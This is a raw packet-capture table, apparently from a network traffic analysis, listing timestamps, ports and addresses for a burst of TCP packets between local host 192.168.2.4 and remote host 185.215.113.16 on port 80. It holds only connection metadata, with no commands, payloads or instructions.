Nov 30, 2024 04:06:43.292800903 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.292994976 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.293627024 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.293725967 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.293817043 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.295804024 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.295886040 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.295911074 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.295936108 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.297987938 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.298110008 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.298132896 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.298146963 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.300096989 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.300204992 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.300223112 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.300318003 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.302126884 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.302251101 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.318317890 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.318365097 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.318396091 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.318533897 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.319188118 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.319298983 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.319329023 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.319516897 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.320967913 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.321089983 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.321166039 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.321264029 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.322758913 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.322858095 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.322866917 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.322937012 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.324542999 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.324620962 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.324647903 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.324724913 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.326318979 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.326396942 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.326455116 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.326515913 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.328052998 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.328176022 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.328207016 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.328248024 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.329792976 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.329843998 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.329859018 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.329935074 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.331518888 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.331588984 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.331641912 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.331711054 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.333220959 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.333287954 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.333324909 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.333441973 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.334903002 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.334981918 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.335012913 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.335074902 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.336597919 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.336680889 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.336711884 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.336772919 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.338263988 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.338316917 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.338362932 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.338499069 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.339241982 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.339342117 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.339371920 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.339421988 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.340207100 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.340300083 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.340329885 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.340399981 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.341170073 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.341250896 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.341254950 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.341355085 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.342135906 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.342228889 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.342336893 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.342396975 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.343127012 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.343175888 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.343261003 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.343329906 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.344130993 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.344238997 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.344274998 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.345089912 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.345180035 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.345210075 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.345597029 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.346036911 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.346139908 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.346152067 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.346203089 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.346993923 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.347070932 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.347100973 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.347172022 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.348000050 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.348072052 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.348113060 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.348934889 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.349045038 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.349050999 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.349122047 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.349901915 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.350001097 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.350009918 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.350358963 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.350866079 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.350981951 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.351000071 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.351105928 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.351821899 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.351900101 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.351927042 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.351979971 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.352802038 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.352885008 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.352910042 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.353228092 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.353759050 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.353827000 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.353852987 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.353904009 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.354734898 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.354852915 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.354861975 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.355720997 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.355834961 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.355859995 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.355916977 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.356669903 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.356810093 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.356837988 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.356918097 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.357640028 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.357824087 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.357847929 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.358606100 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.358616114 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.358673096 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.358707905 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.358885050 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.359582901 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.359659910 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.359692097 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.359765053 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.360513926 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.360631943 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.360662937 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.360681057 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.361491919 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.361597061 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.361624002 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.361810923 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.362461090 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.362580061 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.362597942 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.362689018 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.363539934 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.363627911 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.363635063 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.364388943 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.364415884 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.364496946 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.364526033 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.365345001 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.365372896 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.365453005 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.365479946 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.366347075 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.366384983 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.366422892 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.366449118 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.366617918 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.367322922 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.367430925 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.367463112 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.368268013 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.368298054 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.368361950 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.368388891 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.368694067 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.369221926 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.369280100 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.369318962 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.369645119 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.370191097 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.370301008 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.370309114 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.370680094 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.371151924 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.371262074 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.490953922 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.491028070 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.491091013 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.491161108 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.491427898 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.491486073 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.491511106 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.491648912 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.492415905 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.492466927 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.492486954 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.492594957 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.493365049 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.493441105 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.493469954 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.493541002 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.494313002 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.494375944 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.494411945 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.494468927 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.495275974 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.495354891 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.495388031 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.495459080 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.496238947 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.496325016 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.496350050 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.496463060 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.519613981 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.519704103 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.519718885 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.519778967 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.520095110 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.520165920 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.520203114 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.520273924 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.521058083 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.521151066 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.521163940 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.521226883 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.522003889 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.522085905 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.522114992 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.522198915 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.522964954 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.523036957 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.523071051 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.523145914 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.523932934 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.524004936 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.524039030 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.524094105 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.524903059 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.525017023 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.525039911 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.525116920 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.525856018 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.525908947 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.525933027 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.525978088 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.526825905 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.526931047 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.526947975 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.527013063 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.527856112 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.527955055 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.527986050 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.528054953 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.528732061 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.528806925 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.528834105 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.528887033 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.529692888 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.529751062 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.529778957 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.529835939 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.530659914 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.530762911 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.530766964 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.530834913 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.531609058 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.531663895 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.531821012 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.531873941 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.532604933 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.532705069 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.532722950 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.532820940 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.533543110 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.533626080 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.533657074 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.533726931 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.534501076 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.534569025 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.534605026 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.534650087 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.535468102 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.535533905 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.535569906 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.535675049 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.536401033 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.536528111 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.536550045 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.537377119 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.537404060 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.537483931 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.537512064 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.537925005 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.538336039 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.538424969 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.538424969 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.538501024 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.539289951 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.539393902 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.539398909 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.539688110 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.540281057 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.540373087 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.540375948 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.541210890 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.541321993 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.541331053 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.541450977 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.542172909 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.542277098 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.542432070 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.543148041 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.543257952 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.543282986 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.544095993 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.544122934 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.544190884 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.544218063 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.544384956 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.545058012 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.545149088 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.545175076 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.545222998 CET	49840	80	192.168.2.4	185.215.113.16
